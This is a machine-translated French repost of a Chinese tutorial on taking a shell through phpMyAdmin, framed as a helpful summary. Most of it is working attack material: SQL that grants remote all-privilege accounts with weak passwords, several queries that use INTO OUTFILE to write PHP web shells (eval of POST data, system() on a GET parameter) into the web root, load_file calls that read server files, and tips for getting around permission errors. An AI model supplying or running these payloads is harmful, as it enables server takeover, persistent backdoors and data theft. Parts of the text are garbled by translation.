Maison > base de données > phpMonAdmin > Résumé PHPmyadmin prend le shell

Résumé PHPmyadmin prend le shell

藏色散人
Libérer: 2021-01-04 14:37:48
avant
2014 Les gens l'ont consulté

Ce qui suit est résumé par la colonne tutoriel phpmyadmin phpmyadminObtenez le shell, j'espère qu'il sera utile à vos amis. dans le besoin !

Résumé PHPmyadmin prend le shell

PHPmyadmin prend le résumé du shell

PHPmyadmin change le mot de passe utilisateur

Cliquez directement sur localhost ou 1270.0.1 ci-dessus, la colonne utilisateur apparaîtra, cliquez pour modifier

Ajouter le mot de passe du super utilisateur deviner ooxx et autoriser les connexions externes

GRANT ALL PRIVILEGES ON *.* TO 'guetsec'@'%' IDENTIFIED BY 'ooxx' WITH GRANT OPTION;
Copier après la connexion

Nous pouvons créer un compte root et définir un mot de passe

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;
Copier après la connexion

De cette façon, nous créons un compte de lien externe root avec un mot de passe de 123456. Utilisez 123456 pour les liens externes

Quatre façons classiques de utiliser Shell :

Première méthode :

CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
INSERT INTO `mysql`.`study` (`7on` )VALUES (&#39;<?php @eval_r($_POST[7on])?>&#39;);
SELECT 7onFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
    一句话连接密码:7on
Copier après la connexion

Méthode deux :

读取文件内容:    select load_file(&#39;E:/xamp/www/s.php&#39;);
写一句话:    select &#39;<?php @eval_r($_POST[cmd])?>&#39;INTO OUTFILE &#39;E:/xamp/www/study.php&#39;
cmd执行权限:    select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Copier après la connexion

Troisième méthode :

La version JhackJ de PHPmyadmin prend le shell

Create TABLE study (cmd text NOT NULL);
Insert INTO study (cmd) VALUES(&#39;<?php eval_r($_POST[cmd])?>&#39;);
select cmd from study into outfile &#39;E:/wamp/www/7.php&#39;;
   
Drop TABLE IF EXISTS study;
   
<?php eval_r($_POST[cmd])?>
--------------------------------------------------------------------------------
<?php @eval_r($_POST[cmd])?>
   
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
INSERT INTO study( cmd ) VALUES (&#39;<?php eval_r($_POST[cmd])?>&#39;);# 影响列数: 1
SELECT cmdFROM study INTO OUTFILE &#39;E:/wamp/www/7.php&#39;;# 影响列数: 1
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
Copier après la connexion

Méthode 4 :

select load_file(&#39;E:/xamp/www/study.php&#39;);
select &#39;<?php echo \&#39;<pre class="brush:php;toolbar:false">\&#39;;system($_GET[\&#39;cmd\&#39;]); echo \&#39;
\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
Copier après la connexion

Visitez ensuite l'annuaire du site Web : http://www.2cto.com/ study.php?cmd=dir

Lorsque Phpmyadmin exporte une phrase (Errcode : 13 - Autorisation refusée)

n'a pas l'autorisation pour ce répertoire. Vous pouvez essayer le. répertoire de niveau supérieur ou répertoire de niveau inférieur

Si cela ne fonctionne pas, essayez NTS pour le trafic

Faites également attention au répertoire

Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!

Étiquettes associées:
source:cnblogs.com
Déclaration de ce site Web
Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn
Tutoriels populaires
Plus>
Derniers téléchargements
Plus>
effets Web
Code source du site Web
Matériel du site Web
Modèle frontal